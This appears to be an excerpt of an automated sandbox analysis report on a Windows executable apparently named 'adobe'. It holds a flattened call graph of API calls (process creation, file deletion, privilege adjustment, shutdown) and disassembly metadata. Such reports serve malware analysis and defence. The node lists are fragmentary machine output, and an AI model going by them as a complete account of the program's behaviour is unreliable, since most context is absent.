5752->5753 5754 409309 5753->5754 5755 403198 4 API calls 5754->5755 5756 409311 5755->5756 5756->5554 5758 405198 33 API calls 5757->5758 5759 404ca2 5758->5759 5759->5554 5761 408dc8 5760->5761 5860 408c80 5761->5860 5765 4034f0 18 API calls 5764->5765 5766 406a6b 5765->5766 5767 406a82 GetEnvironmentVariableA 5766->5767 5771 406a95 5766->5771 5786 406dec 5766->5786 5767->5766 5768 406a8e 5767->5768 5769 403198 4 API calls 5768->5769 5769->5771 5771->5718 5781 406a34 5771->5781 5773 403414 5772->5773 5774 4068ab GetFullPathNameA 5773->5774 5775 4068b7 5774->5775 5776 4068ce 5774->5776 5775->5776 5777 4068bf 5775->5777 5778 40322c 4 API calls 5776->5778 5779 403278 18 API calls 5777->5779 5780 4068cc 5778->5780 5779->5780 5780->5730 5790 4069dc 5781->5790 5785 406ce9 5784->5785 5785->5722 5787 406dfa 5786->5787 5788 4034f0 18 API calls 5787->5788 5789 406e08 5788->5789 5789->5766 5797 406978 5790->5797 5792 4069fe 5793 406a06 GetFileAttributesA 5792->5793 5794 406a1b 5793->5794 5795 403198 4 API calls 5794->5795 5796 406a23 5795->5796 5796->5718 5807 406744 5797->5807 5799 4069b0 5802 4069c6 5799->5802 5803 4069bb 5799->5803 5801 406989 5801->5799 5814 406970 CharPrevA 5801->5814 5815 403454 5802->5815 5804 40322c 4 API calls 5803->5804 5806 4069c4 5804->5806 5806->5792 5811 406755 5807->5811 5808 4067b9 5809 4067b4 5808->5809 5810 406680 IsDBCSLeadByte 5808->5810 5809->5801 5810->5809 5811->5808 5812 406773 5811->5812 5812->5809 5822 406680 IsDBCSLeadByte 5812->5822 5814->5801 5816 403486 5815->5816 5817 403459 5815->5817 5818 403198 4 API calls 5816->5818 5817->5816 5820 40346d 5817->5820 5819 40347c 5818->5819 5819->5806 5821 403278 18 API calls 5820->5821 5821->5819 5823 406694 5822->5823 5823->5812 5825 403198 4 API calls 5824->5825 5827 4091d1 5825->5827 5829 4091fe 5827->5829 5841 4032a8 5827->5841 5844 403494 5827->5844 5830 403198 4 API calls 5829->5830 5831 409213 5830->5831 5831->5749 5848 408f70 5832->5848 5834 40904a 5835 40904e 5834->5835 5854 406a48 5834->5854 5835->5749 5838 409081 5857 408fac 5838->5857 5842 403278 18 API calls 5841->5842 5843 4032b5 5842->5843 5843->5827 5845 4034c3 5844->5845 5846 403498 5844->5846 5845->5827 5847 4034f0 18 API calls 5846->5847 5847->5845 5849 408f7a 5848->5849 5850 408f7e 5848->5850 5849->5834 5851 408fa0 SetLastError 5850->5851 5852 408f87 Wow64DisableWow64FsRedirection 5850->5852 5853 408f9b 5851->5853 5852->5853 5853->5834 5855 4069dc 21 API calls 5854->5855 5856 406a52 GetLastError 5855->5856 5856->5838 5858 408fb1 Wow64RevertWow64FsRedirection 5857->5858 5859 408fbb 5857->5859 5858->5859 5859->5749 5861 403198 4 API calls 5860->5861 5864 408cb1 5860->5864 5861->5864 5862 408cdc 5863 4031b8 4 API calls 5862->5863 5865 408d69 5863->5865 5864->5862 5866 408cc8 5864->5866 5867 403278 18 API calls 5864->5867 5869 4032fc 18 API calls 5864->5869 5865->5554 5868 4032fc 18 API calls 5866->5868 5867->5864 5868->5862 5869->5864 5871 406744 IsDBCSLeadByte 5870->5871 5873 406835 5871->5873 5872 40687f 5872->5572 5873->5872 5874 406680 IsDBCSLeadByte 5873->5874 5874->5873 5876 4068f3 5875->5876 5877 406820 IsDBCSLeadByte 5876->5877 5880 4068fe 5877->5880 5878 4066ea 5878->5577 5878->5578 5879 406680 IsDBCSLeadByte 5879->5880 5880->5878 5880->5879 5882 406957 5881->5882 5883 40695b 5881->5883 5882->5592 5886 406970 CharPrevA 5883->5886 5885 40696c 5885->5592 5886->5885 5888 402bd5 RaiseException 5887->5888 5889 402be6 5887->5889 5888->5889 5889->5615 6142 402e64 6143 402e69 6142->6143 6144 402e7a RtlUnwind 6143->6144 6145 402e5e 6143->6145 6146 402e9d 6144->6146 6163 40667c IsDBCSLeadByte 6164 406694 6163->6164 6668 403f7d 6669 403fa2 6668->6669 6672 403f84 6668->6672 6671 403e8e 4 API calls 6669->6671 6669->6672 6670 403f8c 6671->6672 6672->6670 6673 402674 4 API calls 6672->6673 6674 403fca 6673->6674 6681 403d02 6683 403d12 6681->6683 6682 403ddf ExitProcess 6683->6682 6684 403db8 6683->6684 6688 403dea 6683->6688 6691 403da4 6683->6691 6692 403d8f MessageBoxA 6683->6692 6685 403cc8 4 API calls 6684->6685 6686 403dc2 6685->6686 6687 403cc8 4 API calls 6686->6687 6689 403dcc 6687->6689 6701 4019dc 6689->6701 6697 403fe4 6691->6697 6692->6684 6693 403dd1 6693->6682 6693->6688 6698 403fe8 6697->6698 6699 403f07 4 API calls 6698->6699 6700 404006 6699->6700 6702 401abb 6701->6702 6703 4019ed 6701->6703 6702->6693 6704 401a04 RtlEnterCriticalSection 6703->6704 6705 401a0e LocalFree 6703->6705 6704->6705 6706 401a41 6705->6706 6707 401a2f VirtualFree 6706->6707 6708 401a49 6706->6708 6707->6706 6709 401a70 LocalFree 6708->6709 6710 401a87 6708->6710 6709->6709 6709->6710 6711 401aa9 RtlDeleteCriticalSection 6710->6711 6712 401a9f RtlLeaveCriticalSection 6710->6712 6711->6693 6712->6711 6173 404206 6174 4041cc 6173->6174 6177 40420a 6173->6177 6175 404282 6176 403154 4 API calls 6178 404323 6176->6178 6177->6175 6177->6176 6179 402c08 6182 402c82 6179->6182 6183 402c19 6179->6183 6180 402c56 RtlUnwind 6181 403154 4 API calls 6180->6181 6181->6182 6183->6180 6183->6182 6186 402b28 6183->6186 6187 402b31 RaiseException 6186->6187 6188 402b47 6186->6188 6187->6188 6188->6180 6189 408c10 6190 408c17 6189->6190 6191 403198 4 API calls 6190->6191 6199 408cb1 6191->6199 6192 408cdc 6193 4031b8 4 API calls 6192->6193 6194 408d69 6193->6194 6195 408cc8 6197 4032fc 18 API calls 6195->6197 6196 403278 18 API calls 6196->6199 6197->6192 6198 4032fc 18 API calls 6198->6199 6199->6192 6199->6195 6199->6196 6199->6198 6200 40a011 6201 40a036 6200->6201 6202 407918 InterlockedExchange 6201->6202 6203 40a060 6202->6203 6204 40a070 6203->6204 6205 409aa0 18 API calls 6203->6205 6210 4076ac SetEndOfFile 6204->6210 6205->6204 6207 40a08c 6208 4025ac 4 API calls 6207->6208 6209 40a0c3 6208->6209 6211 4076c3 6210->6211 6212 4076bc 6210->6212 6211->6207 6213 40748c 35 API calls 6212->6213 6213->6211 6717 409916 6718 409918 6717->6718 6719 409956 CallWindowProcA 6718->6719 6720 40993a 6718->6720 6719->6720 5941 407017 5942 407008 SetErrorMode 5941->5942 6218 403018 6219 403070 6218->6219 6220 403025 6218->6220 6221 40302a RtlUnwind 6220->6221 6222 40304e 6221->6222 6224 402f78 6222->6224 6225 402be8 6222->6225 6226 402bf1 RaiseException 6225->6226 6227 402c04 6225->6227 6226->6227 6227->6219 6727 409918 6728 40993a 6727->6728 6730 409927 6727->6730 6729 409956 CallWindowProcA 6729->6728 6730->6728 6730->6729 6232 40901e 6233 409010 6232->6233 6234 408fac Wow64RevertWow64FsRedirection 6233->6234 6235 409018 6234->6235 6236 409020 SetLastError 6237 409029 6236->6237 6248 403a28 ReadFile 6249 403a46 6248->6249 6250 403a49 GetLastError 6248->6250 6079 40762c ReadFile 6080 407663 6079->6080 6081 40764c 6079->6081 6082 407652 GetLastError 6081->6082 6083 40765c 6081->6083 6082->6080 6082->6083 6084 40748c 35 API calls 6083->6084 6084->6080 6255 40a02c 6256 409aa0 18 API calls 6255->6256 6257 40a031 6256->6257 6258 40a036 6257->6258 6259 402f24 5 API calls 6257->6259 6260 407918 InterlockedExchange 6258->6260 6259->6258 6261 40a060 6260->6261 6262 40a070 6261->6262 6263 409aa0 18 API calls 6261->6263 6264 4076ac 36 API calls 6262->6264 6263->6262 6265 40a08c 6264->6265 6266 4025ac 4 API calls 6265->6266 6267 40a0c3 6266->6267 6731 40712e 6732 407118 6731->6732 6733 403198 4 API calls 6732->6733 6734 407120 6733->6734 6735 403198 4 API calls 6734->6735 6736 407128 6735->6736 6737 408f30 6740 408dfc 6737->6740 6741 408e05 6740->6741 6742 403198 4 API calls 6741->6742 6743 408e13 6741->6743 6742->6741 6744 403932 6745 403924 6744->6745 6748 40374c 6745->6748 6747 40392c 6749 403766 6748->6749 6750 403759 6748->6750 6749->6747 6750->6749 6751 403779 VariantClear 6750->6751 6751->6747 5890 4075c4 SetFilePointer 5891 4075f7 5890->5891 5892 4075e7 GetLastError 5890->5892 5892->5891 5893 4075f0 5892->5893 5894 40748c 35 API calls 5893->5894 5894->5891 6268 405ac4 6269 405ad4 6268->6269 6270 405acc 6268->6270 6271 405ad2 6270->6271 6272 405adb 6270->6272 6275 405a3c 6271->6275 6273 405930 19 API calls 6272->6273 6273->6269 6276 405a44 6275->6276 6277 405a5e 6276->6277 6278 403154 4 API calls 6276->6278 6279 405a63 6277->6279 6280 405a7a 6277->6280 6278->6276 6281 405930 19 API calls 6279->6281 6282 403154 4 API calls 6280->6282 6283 405a76 6281->6283 6284 405a7f 6282->6284 6286 403154 4 API calls 6283->6286 6285 4059a0 33 API calls 6284->6285 6285->6283 6287 405aa8 6286->6287 6288 403154 4 API calls 6287->6288 6289 405ab6 6288->6289 6289->6269 6290 4076c8 WriteFile 6291 4076e8 6290->6291 6293 4076ef 6290->6293 6294 40748c 35 API calls 6291->6294 6292 407700 6293->6292 6295 4073ec 34 API calls 6293->6295 6294->6293 6295->6292 6296 40a2ca 6305 4096fc 6296->6305 6299 402f24 5 API calls 6300 40a2d4 6299->6300 6301 403198 4 API calls 6300->6301 6302 40a2f3 6301->6302 6303 403198 4 API calls 6302->6303 6304 40a2fb 6303->6304 6314 40569c 6305->6314 6307 409745 6311 403198 4 API calls 6307->6311 6308 409717 6308->6307 6320 40720c 6308->6320 6310 409735 6313 40973d MessageBoxA 6310->6313 6312 40975a 6311->6312 6312->6299 6313->6307 6315 403154 4 API calls 6314->6315 6316 4056a1 6315->6316 6317 4056b9 6316->6317 6318 403154 4 API calls 6316->6318 6317->6308 6319 4056af 6318->6319 6319->6308 6321 40569c 4 API calls 6320->6321 6322 40721b 6321->6322 6323 407221 6322->6323 6324 40722f 6322->6324 6325 40322c 4 API calls 6323->6325 6327 40724b 6324->6327 6328 40723f 6324->6328 6326 40722d 6325->6326 6326->6310 6338 4032b8 6327->6338 6331 4071d0 6328->6331 6332 40322c 4 API calls 6331->6332 6333 4071df 6332->6333 6334 4071fc 6333->6334 6335 406950 CharPrevA 6333->6335 6334->6326 6336 4071eb 6335->6336 6336->6334 6337 4032fc 18 API calls 6336->6337 6337->6334 6339 403278 18 API calls 6338->6339 6340 4032c2 6339->6340 6340->6326 6341 402ccc 6344 402cdd 6341->6344 6346 402cfe 6341->6346 6342 402d88 RtlUnwind 6343 403154 4 API calls 6342->6343 6343->6346 6344->6342 6345 402b28 RaiseException 6344->6345 6344->6346 6347 402d7f 6345->6347 6347->6342 6760 403fcd 6761 403f07 4 API calls 6760->6761 6762 403fd6 6761->6762 6763 403e9c 4 API calls 6762->6763 6764 403fe2 6763->6764 6348 4024d0 6349 4024e4 6348->6349 6350 4024e9 6348->6350 6353 401918 4 API calls 6349->6353 6351 402518 6350->6351 6352 40250e RtlEnterCriticalSection 6350->6352 6356 4024ed 6350->6356 6363 402300 6351->6363 6352->6351 6353->6350 6357 401fd4 14 API calls 6360 402531 6357->6360 6358 402581 6359 402577 RtlLeaveCriticalSection 6359->6358 6361 402525 6360->6361 6373 40215c 6360->6373 6361->6358 6361->6359 6364 402314 6363->6364 6365 402335 6364->6365 6367 4023b8 6364->6367 6366 402344 6365->6366 6387 401b74 6365->6387 6366->6357 6366->6361 6367->6366 6371 402455 6367->6371 6390 401d80 6367->6390 6394 401e84 6367->6394 6371->6366 6372 401d00 9 API calls 6371->6372 6372->6366 6374 40217a 6373->6374 6375 402175 6373->6375 6377 4021ab RtlEnterCriticalSection 6374->6377 6380 4021b5 6374->6380 6381 40217e 6374->6381 6376 401918 4 API calls 6375->6376 6376->6374 6377->6380 6378 4021c1 6382 4022e3 RtlLeaveCriticalSection 6378->6382 6383 4022ed 6378->6383 6379 402244 6379->6381 6384 401d80 7 API calls 6379->6384 6380->6378 6380->6379 6385 402270 6380->6385 6381->6361 6382->6383 6383->6361 6384->6381 6385->6378 6386 401d00 7 API calls 6385->6386 6386->6378 6388 40215c 9 API calls 6387->6388 6389 401b95 6388->6389 6389->6366 6391 401d92 6390->6391 6392 401d89 6390->6392 6391->6367 6392->6391 6393 401b74 9 API calls 6392->6393 6393->6391 6399 401768 6394->6399 6396 401e99 6397 401ea6 6396->6397 6410 401dcc 6396->6410 6397->6367 6401 401787 6399->6401 6400 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6400->6401 6401->6400 6402 40183b 6401->6402 6403 40132c LocalAlloc 6401->6403 6405 401821 6401->6405 6407 4017d6 6401->6407 6409 4017e7 6402->6409 6421 4015c4 6402->6421 6403->6401 6406 40150c VirtualFree 6405->6406 6406->6409 6417 40150c 6407->6417 6409->6396 6411 401d80 9 API calls 6410->6411 6412 401de0 6411->6412 6425 40132c 6412->6425 6414 401df0 6415 401df8 6414->6415 6429 401b44 6414->6429 6415->6397 6420 40153b 6417->6420 6418 401594 6418->6409 6419 401568 VirtualFree 6419->6420 6420->6418 6420->6419 6422 40160a 6421->6422 6423 401626 VirtualAlloc 6422->6423 6424 40163a 6422->6424 6423->6422 6423->6424 6424->6409 6426 401348 6425->6426 6434 4012e4 6426->6434 6430 401b61 6429->6430 6431 401b52 6429->6431 6430->6415 6432 401d00 9 API calls 6431->6432 6433 401b5f 6432->6433 6433->6415 6437 40128c 6434->6437 6438 401298 LocalAlloc 6437->6438 6439 4012aa 6437->6439 6438->6439 6439->6414 6440 4028d2 6441 4028da 6440->6441 6442 403554 4 API calls 6441->6442 6443 4028ef 6441->6443 6442->6441 6444 4025ac 4 API calls 6443->6444 6445 4028f4 6444->6445 6765 4019d3 6766 4019ba 6765->6766 6767 4019c3 RtlLeaveCriticalSection 6766->6767 6768 4019cd 6766->6768 6767->6768 5895 407fd4 5896 407fe6 5895->5896 5898 407fed 5895->5898 5906 407f10 5896->5906 5899 408015 5898->5899 5900 408017 5898->5900 5904 408021 5898->5904 5920 407e2c 5899->5920 5917 407d7c 5900->5917 5901 40804e 5903 407d7c 33 API calls 5903->5901 5904->5901 5904->5903 5907 407f25 5906->5907 5908 407d7c 33 API calls 5907->5908 5909 407f34 5907->5909 5908->5909 5910 407f6e 5909->5910 5911 407d7c 33 API calls 5909->5911 5912 407f82 5910->5912 5913 407d7c 33 API calls 5910->5913 5911->5910 5916 407fae 5912->5916 5927 407eb8 5912->5927 5913->5912 5916->5898 5930 4058b4 5917->5930 5919 407d9e 5919->5904 5921 405184 33 API calls 5920->5921 5922 407e57 5921->5922 5938 407de4 5922->5938 5924 407e5f 5925 403198 4 API calls 5924->5925 5926 407e74 5925->5926 5926->5904 5928 407ec7 VirtualFree 5927->5928 5929 407ed9 VirtualAlloc 5927->5929 5928->5929 5929->5916 5931 4058c0 5930->5931 5932 405184 33 API calls 5931->5932 5933 4058ed 5932->5933 5934 4031e8 18 API calls 5933->5934 5935 4058f8 5934->5935 5936 403198 4 API calls 5935->5936 5937 40590d 5936->5937 5937->5919 5939 4058b4 33 API calls 5938->5939 5940 407e06 5939->5940 5940->5924 6450 40a0d5 6451 40a105 6450->6451 6452 40a10f CreateWindowExA SetWindowLongA 6451->6452 6453 405184 33 API calls 6452->6453 6454 40a192 6453->6454 6455 4032fc 18 API calls 6454->6455 6456 40a1a0 6455->6456 6457 4032fc 18 API calls 6456->6457 6458 40a1ad 6457->6458 6459 406b7c 19 API calls 6458->6459 6460 40a1b9 6459->6460 6461 4032fc 18 API calls 6460->6461 6462 40a1c2 6461->6462 6463 4099a4 43 API calls 6462->6463 6464 40a1d4 6463->6464 6465 409884 19 API calls 6464->6465 6466 40a1e7 6464->6466 6465->6466 6467 40a220 6466->6467 6468 4094d8 9 API calls 6466->6468 6469 40a239 6467->6469 6472 40a233 RemoveDirectoryA 6467->6472 6468->6467 6470 40a242 73A25CF0 6469->6470 6471 40a24d 6469->6471 6470->6471 6473 40a275 6471->6473 6474 40357c 4 API calls 6471->6474 6472->6469 6475 40a26b 6474->6475 6476 4025ac 4 API calls 6475->6476 6476->6473 5943 40a0e7 5944 40a0eb SetLastError 5943->5944 5975 409648 GetLastError 5944->5975 5947 40a105 5949 40a10f CreateWindowExA SetWindowLongA 5947->5949 5948 402f24 5 API calls 5948->5947 5950 405184 33 API calls 5949->5950 5951 40a192 5950->5951 5952 4032fc 18 API calls 5951->5952 5953 40a1a0 5952->5953 5954 4032fc 18 API calls 5953->5954 5955 40a1ad 5954->5955 5988 406b7c GetCommandLineA 5955->5988 5958 4032fc 18 API calls 5959 40a1c2 5958->5959 5993 4099a4 5959->5993 5962 409884 19 API calls 5963 40a1e7 5962->5963 5964 40a220 5963->5964 5965 40a207 5963->5965 5967 40a239 5964->5967 5970 40a233 RemoveDirectoryA 5964->5970 6009 4094d8 5965->6009 5968 40a242 73A25CF0 5967->5968 5969 40a24d 5967->5969 5968->5969 5971 40a275 5969->5971 6017 40357c 5969->6017 5970->5967 5973 40a26b 5974 4025ac 4 API calls 5973->5974 5974->5971 5976 404c84 33 API calls 5975->5976 5977 40968f 5976->5977 5978 407284 19 API calls 5977->5978 5979 40969f 5978->5979 5980 408da8 18 API calls 5979->5980 5981 4096b4 5980->5981 5982 405880 18 API calls 5981->5982 5983 4096c3 5982->5983 5984 4031b8 4 API calls 5983->5984 5985 4096e2 5984->5985 5986 403198 4 API calls 5985->5986 5987 4096ea 5986->5987 5987->5947 5987->5948 5989 406af0 18 API calls 5988->5989 5990 406ba1 5989->5990 5991 403198 4 API calls 5990->5991 5992 406bbf 5991->5992 5992->5958 5994 4033b4 18 API calls 5993->5994 5995 4099df 5994->5995 5996 409a11 CreateProcessA 5995->5996 5997 409a24 CloseHandle 5996->5997 5998 409a1d 5996->5998 6000 409a2d 5997->6000 5999 409648 35 API calls 5998->5999 5999->5997 6030 409978 6000->6030 6003 409a49 6004 409978 3 API calls 6003->6004 6005 409a4e GetExitCodeProcess CloseHandle 6004->6005 6006 409a6e 6005->6006 6007 403198 4 API calls 6006->6007 6008 409a76 6007->6008 6008->5962 6008->5963 6010 409532 6009->6010 6014 4094eb 6009->6014 6010->5964 6011 4094f3 Sleep 6011->6014 6012 409503 Sleep 6012->6014 6014->6010 6014->6011 6014->6012 6015 40951a GetLastError 6014->6015 6034 408fbc 6014->6034 6015->6010 6016 409524 GetLastError 6015->6016 6016->6010 6016->6014 6018 403591 6017->6018 6019 4035a0 6017->6019 6022 4035d0 6018->6022 6023 40359b 6018->6023 6027 4035b6 6018->6027 6020 4035b1 6019->6020 6021 4035b8 6019->6021 6024 403198 4 API calls 6020->6024 6025 4031b8 4 API calls 6021->6025 6022->6027 6028 40357c 4 API calls 6022->6028 6023->6019 6026 4035ec 6023->6026 6024->6027 6025->6027 6026->6027 6042 403554 6026->6042 6027->5973 6028->6022 6031 40998c PeekMessageA 6030->6031 6032 409980 TranslateMessage DispatchMessageA 6031->6032 6033 40999e MsgWaitForMultipleObjects 6031->6033 6032->6031 6033->6000 6033->6003 6035 408f70 2 API calls 6034->6035 6036 408fd2 6035->6036 6037 408fd6 6036->6037 6038 408ff2 DeleteFileA GetLastError 6036->6038 6037->6014 6039 409010 6038->6039 6040 408fac Wow64RevertWow64FsRedirection 6039->6040 6041 409018 6040->6041 6041->6014 6043 403566 6042->6043 6045 403578 6043->6045 6046 403604 6043->6046 6045->6026 6047 40357c 6046->6047 6048 4035a0 6047->6048 6049 4035b6 6047->6049 6052 4035d0 6047->6052 6053 40359b 6047->6053 6050 4035b1 6048->6050 6051 4035b8 6048->6051 6049->6043 6054 403198 4 API calls 6050->6054 6055 4031b8 4 API calls 6051->6055 6052->6049 6056 40357c 4 API calls 6052->6056 6053->6048 6058 4035ec 6053->6058 6054->6049 6055->6049 6056->6052 6057 403554 4 API calls 6057->6058 6058->6049 6058->6057 6772 402be9 RaiseException 6773 402c04 6772->6773 6483 402af2 6484 402afe 6483->6484 6487 402ed0 6484->6487 6488 403154 4 API calls 6487->6488 6490 402ee0 6488->6490 6489 402b03 6490->6489 6492 402b0c 6490->6492 6493 402b25 6492->6493 6494 402b15 RaiseException 6492->6494 6493->6489 6494->6493 6774 402dfa 6775 402e26 6774->6775 6776 402e0d 6774->6776 6778 402ba4 6776->6778 6779 402bc9 6778->6779 6780 402bad 6778->6780 6779->6775 6781 402bb5 RaiseException 6780->6781 6781->6779 6782 4075fa GetFileSize 6783 407626 6782->6783 6784 407616 GetLastError 6782->6784 6784->6783 6785 40761f 6784->6785 6786 40748c 35 API calls 6785->6786 6786->6783 6787 406ffb 6788 407008 SetErrorMode 6787->6788 6499 403a80 CloseHandle 6500 403a90 6499->6500 6501 403a91 GetLastError 6499->6501 6502 40a282 6504 40a1f4 6502->6504 6503 40a220 6506 40a239 6503->6506 6509 40a233 RemoveDirectoryA 6503->6509 6504->6503 6505 4094d8 9 API calls 6504->6505 6505->6503 6507 40a242 73A25CF0 6506->6507 6508 40a24d 6506->6508 6507->6508 6510 40a275 6508->6510 6511 40357c 4 API calls 6508->6511 6509->6506 6512 40a26b 6511->6512 6513 4025ac 4 API calls 6512->6513 6513->6510 6514 404283 6515 4042c3 6514->6515 6516 403154 4 API calls 6515->6516 6517 404323 6516->6517 6789 404185 6790 4041ff 6789->6790 6791 4041cc 6790->6791 6792 403154 4 API calls 6790->6792 6793 404323 6792->6793 6518 40a287 6519 40a290 6518->6519 6522 40a2bb 6518->6522 6528 409448 6519->6528 6521 40a295 6521->6522 6526 40a2b3 MessageBoxA 6521->6526 6523 403198 4 API calls 6522->6523 6524 40a2f3 6523->6524 6525 403198 4 API calls 6524->6525 6527 40a2fb 6525->6527 6526->6522 6529 409454 GetCurrentProcess OpenProcessToken 6528->6529 6530 4094af ExitWindowsEx 6528->6530 6531 409466 6529->6531 6532 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6529->6532 6530->6531 6531->6521 6532->6530 6532->6531 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6540 403e67 6534->6540 6542 403cc8 6535->6542 6537 402674 4 API calls 6536->6537 6539 403e78 6537->6539 6540->6539 6546 402674 6540->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6540 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6539 6553 407e90 6554 407eb8 VirtualFree 6553->6554 6555 407e9d 6554->6555 6802 403991 6803 403983 6802->6803 6804 40374c VariantClear 6803->6804 6805 40398b 6804->6805 6806 405b92 6808 405b94 6806->6808 6807 405bd0 6811 405930 19 API calls 6807->6811 6808->6807 6809 405be7 6808->6809 6810 405bca 6808->6810 6814 404ccc 19 API calls 6809->6814 6810->6807 6812 405c3c 6810->6812 6819 405be3 6811->6819 6813 4059a0 33 API calls 6812->6813 6813->6819 6816 405c10 6814->6816 6815 403198 4 API calls 6818 405c76 6815->6818 6817 4059a0 33 API calls 6816->6817 6817->6819 6819->6815 6558 403e95 6559 403e4c 6558->6559 6560 403e67 6559->6560 6561 403e62 6559->6561 6562 403e7b 6559->6562 6565 403e78 6560->6565 6566 402674 4 API calls 6560->6566 6564 403cc8 4 API calls 6561->6564 6563 402674 4 API calls 6562->6563 6563->6565 6564->6560 6566->6565 6567 403a97 6568 403aac 6567->6568 6569 403bbc GetStdHandle 6568->6569 6570 403b0e CreateFileA 6568->6570 6579 403ab2 6568->6579 6571 403c17 GetLastError 6569->6571 6584 403bba 6569->6584 6570->6571 6572 403b2c 6570->6572 6571->6579 6574 403b3b GetFileSize 6572->6574 6572->6584 6574->6571 6575 403b4e SetFilePointer 6574->6575 6575->6571 6580 403b6a ReadFile 6575->6580 6576 403be7 GetFileType 6578 403c02 CloseHandle 6576->6578 6576->6579 6578->6579 6580->6571 6581 403b8c 6580->6581 6582 403b9f SetFilePointer 6581->6582 6581->6584 6582->6571 6583 403bb0 SetEndOfFile 6582->6583 6583->6571 6583->6584 6584->6576 6584->6579 6834 408da4 6835 408dc8 6834->6835 6836 408c80 18 API calls 6835->6836 6837 408dd1 6836->6837 6585 402caa 6586 403154 4 API calls 6585->6586 6587 402caf 6586->6587 6838 4011aa 6839 4011ac GetStdHandle 6838->6839 6085 4076ac SetEndOfFile 6086 4076c3 6085->6086 6087 4076bc 6085->6087 6088 40748c 35 API calls 6087->6088 6088->6086 6588 4028ac 6589 402594 18 API calls 6588->6589 6590 4028b6 6589->6590 6591 401ab9 6592 401a96 6591->6592 6593 401aa9 RtlDeleteCriticalSection 6592->6593 6594 401a9f RtlLeaveCriticalSection 6592->6594 6594->6593

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 132 409b30-409b54 GetSystemInfo VirtualQuery 133 409be4-409beb 132->133 134 409b5a 132->134 135 409bd9-409bde 134->135 135->133 136 409b5c-409b63 135->136 137 409bc5-409bd7 VirtualQuery 136->137 138 409b65-409b69 136->138 137->133 137->135 138->137 139 409b6b-409b73 138->139 140 409b84-409b95 VirtualProtect 139->140 141 409b75-409b78 139->141 143 409b97 140->143 144 409b99-409b9b 140->144 141->140 142 409b7a-409b7d 141->142 142->140 145 409b7f-409b82 142->145 143->144 146 409baa-409bad 144->146 145->140 145->144 147 409b9d-409ba6 call 409b28 146->147 148 409baf-409bb1 146->148 147->146 148->137 150 409bb3-409bc0 VirtualProtect 148->150 150->137
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2441996862-0
                                                                                                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

